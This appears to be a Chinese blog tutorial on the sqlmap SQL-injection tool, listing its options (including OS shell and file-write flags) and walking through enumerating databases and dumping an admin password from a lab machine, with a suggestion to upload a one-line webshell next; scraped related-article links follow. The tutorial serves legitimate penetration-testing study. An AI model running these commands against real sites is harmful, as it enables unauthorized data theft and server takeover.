sqlmap注入入门

sqlmap的用法:

​ linux中: sqlmap [选项]

​ Windows中: python sqlmap [选项]

常用的参数及含义:

  • 目标

    ​ -d DIRECT 直接连接数据库

    ​ -u URL, --url=URL 目标 URL(例如:"http://www.site.com/vuln.php?id=1")

    ​ -l LOGFILE 从 Burp 或 WebScarab 代理的日志文件中解析目标地址

    ​ -x SITEMAPURL 从远程网站地图(.xml)文件中解析目标

    ​ -m BULKFILE 从文本文件中获取批量目标

    ​ -r REQUESTFILE 从文件中读取 HTTP 请求

    ​ -g GOOGLEDORK 使用 Google dork 结果作为目标

    ​ -c CONFIGFILE 从 INI 配置文件中加载选项

  • 枚举:

    ​ 以下选项用于获取后端数据库管理系统的信息,结构和数据表中的数据。此外,还可以运行你输入的 SQL 语句

    ​ a, --all 获取所有信息、数据

    ​ -b, --banner 获取 DBMS banner

    ​ --current-user 获取 DBMS 当前用户

    ​ --current-db 获取 DBMS 当前数据库

    ​ --hostname 获取 DBMS 服务器的主机名

    ​ --is-dba 探测 DBMS 当前用户是否为 DBA(数据库管理员)

    ​ --users 枚举出 DBMS 所有用户

    ​ --passwords 枚举出 DBMS 所有用户的密码哈希

    ​ --sql-query=QUERY 指定要执行的 SQL 语句

    ​ --sql-shell 调出交互式 SQL shell

    ​ --sql-file=SQLFILE 执行文件中的 SQL 语句

  • 暴力破解:

    ​ 以下选项用于暴力破解测试

    ​ --common-tables 检测常见的表名是否存在

    ​ --common-columns 检测常用的列名是否存在

  • 访问文件系统:

    ​ 以下选项用于访问后端数据库管理系统的底层文件系统

    ​ --file-read=RFILE 读取后端 DBMS 文件系统中的文件

    ​ --file-write=WFILE 写入后端 DBMS 文件系统中的文件

    ​ --file-dest=DFILE 使用文件绝对路径写入到后端 DBMS

  • 访问操作系统:

    ​ 以下选项用于访问后端数据库管理系统的底层操作系统

    ​ --os-cmd=OSCMD 执行操作系统命令

    ​ --os-shell 调出交互式操作系统 shell

    ​ --os-pwn 调出 OOB shell,Meterpreter 或 VNC

    ​ --os-smbrelay 一键调出 OOB shell,Meterpreter 或 VNC

    靶机实战
    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11

可以得出目标主机是Ubuntu,web服务为apache,数据库管理系统是MySQL以及它们的版本信息。

  1. 列举出DBMS中所有的数据库

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --dbs

  1. 获取DBMS当前数据库

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --current-db

  1. 列举出test数据库中的所有表名

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 -D test --tables
    


 我们发现了一个admin表,猜测其中可能有网站管路员的密码信息

  1. 查询admin表中的所有信息

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-query="select * from test.admin;"



 我们获得了admin账户的密码,为mysql,我们可以利用admin用户,向目标服务器上传一句话木马,获取webshell。(可以自行百度“一句话木马”)

  1. 调出交互式SQL shell

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-shell

在sql-shell可以执行sql查询语句

    select * from test.admin;

和第四步得到的结果是一样的

小结

利用SQLmap可以进行简单的sql注入,方便快捷。利用sqlmap可以查看目标机器的os,DBMS等。还可以可以枚举数据库、表、列。以上结果只是为了演示sqlmap的基本用法,在实际操作中很可能注入失败,可以进一步的查看sqlmap wiki。

sqlmap注入入门的更多相关文章

  1. sqlmap注入小结

    sqlmap注入时: 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可 ...

  2. 使用sqlmap注入DVWA的SQL Injection菜单

    1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用a ...

  3. SQLMAP注入教程-11种常见SQLMAP使用方法详解

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直 ...

  4. sqlmap注入教程

    1.SQLMAP用于Access数据库注入 (1)猜解是否能注入win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorB ...

  5. sqlmap 注入的方法及技巧

    sqlmap 注入的方法及技巧 当给 sqlmap 这么一个 url 的时候,它会: 1.判断可注入的参数 2.判断可以用那种 SQL 注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些 ...

  6. Sqlmap注入工具

    Sqlmap注入工具 http://sqlmap.org/ Sqlmap是国外的一个免费的注入工具,基于python开发,支持现在几乎所有的数据库,支持get.post.cookie注入,可以添加co ...

  7. 在windows系统和kali中通过sqlmap注入

    第1章 在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Pyt ...

  8. sql-labs 18-20(sqlmap注入)

    这三题主要是关于HTTP头部的注入 常见的HTTP注入点产生位置为 [Referer].[X-Forwarded-For].[Cookie].[X-Real-IP].[Accept-Language] ...

  9. sqlmap:入门(手工注入)

    一. 联合查询注入union(less-1) 1. union操作符用于合并两个或多个select语句结果集: 2. union后的select语句必须拥有和最前的select语句拥有相同数量的字段, ...

随机推荐

  1. MySql 触发器的新增、修改、删除的创建

    MySql 触发器与SQL server 触发器不同: SQL Server   使用 inserted.deleted 代表被触发的数据. MySQL NEW代表触发后的新数据行,Old代表当前触发 ...

  2. vps install ss

    1.install ss yum install python-setuptools easy_install pip pip install shadowsocks 2.config ss (sin ...

  3. React 系列教程2:编写兰顿蚂蚁演示程序

    简介 最早接触兰顿蚂蚁是在做参数化的时候,那时候只感觉好奇,以为是很复杂的东西.因无意中看到生命游戏的 React 实现,所以希望通过兰顿蚂蚁的例子再学习一下 React. 兰顿蚂蚁的规则非常简单: ...

  4. SVN和GIT

    一.SVN SVN使用起来还是比较简单的,我使用的SVN小乌龟版本是1.1的.(SVN已经可以正常使用了) 先说下自己了解的SVN流程吧,可能比较简单,不过这个也是实际的使用情况,忽略了很多其他功能( ...

  5. 简单数论之整除&质因数分解&唯一分解定理

    [整除] 若a被b整除,即a是b的倍数,那么记作b|a("|"是整除符号),读作"b整除a"或"a能被b整除".b叫做a的约数(或因数),a ...

  6. Centos7 IPv6 Route And Dhcpv6 Server(借鉴补充)

    软件:radvd.dhcp 1)启用ipv6 vi /etc/sysctl.conf net.ipv6.conf.all.disable_ipv6 = 0net.ipv6.conf.default.d ...

  7. 认识 WebService

     什么是服务? 1)现在的应用程序变得越来越复杂,甚至只靠单一的应用程序无法完成全部的工作.更别说只使用一种语言了. 2)大家在写应用程序查询数据库时,并没有考虑过为什么可以将查询结果返回给上层的应用 ...

  8. Virtual DOM 系列三:Diff算法

    DOM操作是昂贵的,为了减少DOM操作,才有了Virtual DOM.而Virtual DOM的关键就是通过对比新旧vnode,找出差异部分来更新节点.对比的关键算法就是Diff算法. 历史由来: d ...

  9. sax

    <?xml version="1.0" encoding="UTF-8"?> <beauties> <beauty> < ...

  10. Mobile CI/CD 101

    This is a guest post by Slava Chernikoff, Principal Engineer at Binwell. Mobile DevOps falls under t ...